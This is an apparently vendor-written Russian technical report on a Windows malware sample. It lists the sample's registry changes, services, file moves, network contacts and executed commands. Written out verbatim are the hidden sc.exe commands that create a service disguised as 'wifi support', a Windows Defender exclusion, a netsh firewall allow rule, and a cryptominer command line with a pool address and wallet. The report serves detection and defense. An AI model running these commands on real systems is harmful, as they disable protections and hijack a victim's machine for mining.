Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\ibvzxkvy] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\ibvzxkvy] 'ImagePath' = '%WINDIR%\SysWOW64\ibvzxkvy\xrritctv.exe /d"<Полный путь к файлу>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\ibvzxkvy] 'ImagePath' = '%WINDIR%\SysWOW64\ibvzxkvy\xrritctv.exe'
Создает следующие сервисы
- 'ibvzxkvy' %WINDIR%\SysWOW64\ibvzxkvy\xrritctv.exe /d"<Полный путь к файлу>"
- 'ibvzxkvy' %WINDIR%\SysWOW64\ibvzxkvy\xrritctv.exe
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса с помощью следующих ключей реестра::
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\ibvzxkvy' = '00000000'
Запускает на исполнение
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Внедряет код в
следующие системные процессы:
- %WINDIR%\syswow64\svchost.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\xrritctv.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Перемещает следующие файлы
- %TEMP%\xrritctv.exe в %WINDIR%\syswow64\ibvzxkvy\xrritctv.exe
Самоудаляется.
Сетевая активность
Подключается к
- 'mi##########m.mail.protection.outlook.com':25
- '19#.#87.29.221':443
- 'wo##.#-poster.info':25000
- 'de#####ementrivesud.com':80
- 'si###n.ea.com':443
- 'google.com':443
- 'ac###nts.ea.com':443
- 'yandex.ru':443
- '20#.#38.181.240':25
- 'in###gram.com':443
- 'google.com':80
- '18#.#53.217.20':423
- '14#.#6.108.82':423
- '45.#0.34.87':423
- '13#.#.232.208':423
- '5.#.72.48':423
- '21#.#72.179.54':423
- 'ms#.##ol-pay.com':6199
- '18#.#54.190.218':487
- '43.#31.4.7':443
- 'go##le.es':443
- 'IP###########031-00.auth.np.ac.playstation.net':443
TCP
Запросы HTTP GET
- http://www.google.com/
- http://de#####ementrivesud.com/bquqwtns.php
Запросы HTTP POST
- http://wo##.###oster.info:25000/ via wo##.#-poster.info
UDP
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK wo##.#-poster.info
- DNS ASK de#####ementrivesud.com
- DNS ASK si###n.ea.com
- DNS ASK ac###nts.ea.com
- DNS ASK yandex.ru
- DNS ASK in###gram.com
- DNS ASK go##le.es
- DNS ASK google.com
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.#11.95.bl.spamcop.net
- DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK ms#.##ol-pay.com
- DNS ASK IP###########031-00.auth.np.ac.playstation.net
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\ibvzxkvy\xrritctv.exe' /d"<Полный путь к файлу>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\ibvzxkvy\' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\xrritctv.exe" %WINDIR%\SysWOW64\ibvzxkvy\' (со скрытым окном)
- '%WINDIR%\syswow64\sc.exe' create ibvzxkvy binPath= "%WINDIR%\SysWOW64\ibvzxkvy\xrritctv.exe /d\"<Полный путь к файлу>\"" type= own start= auto DisplayName= "wifi support"' (со скрытым окном)
- '%WINDIR%\syswow64\sc.exe' description ibvzxkvy "wifi internet conection"' (со скрытым окном)
- '%WINDIR%\syswow64\sc.exe' start ibvzxkvy' (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\ibvzxkvy\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\xrritctv.exe" %WINDIR%\SysWOW64\ibvzxkvy\
- '%WINDIR%\syswow64\sc.exe' create ibvzxkvy binPath= "%WINDIR%\SysWOW64\ibvzxkvy\xrritctv.exe /d\"<Полный путь к файлу>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description ibvzxkvy "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start ibvzxkvy
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k
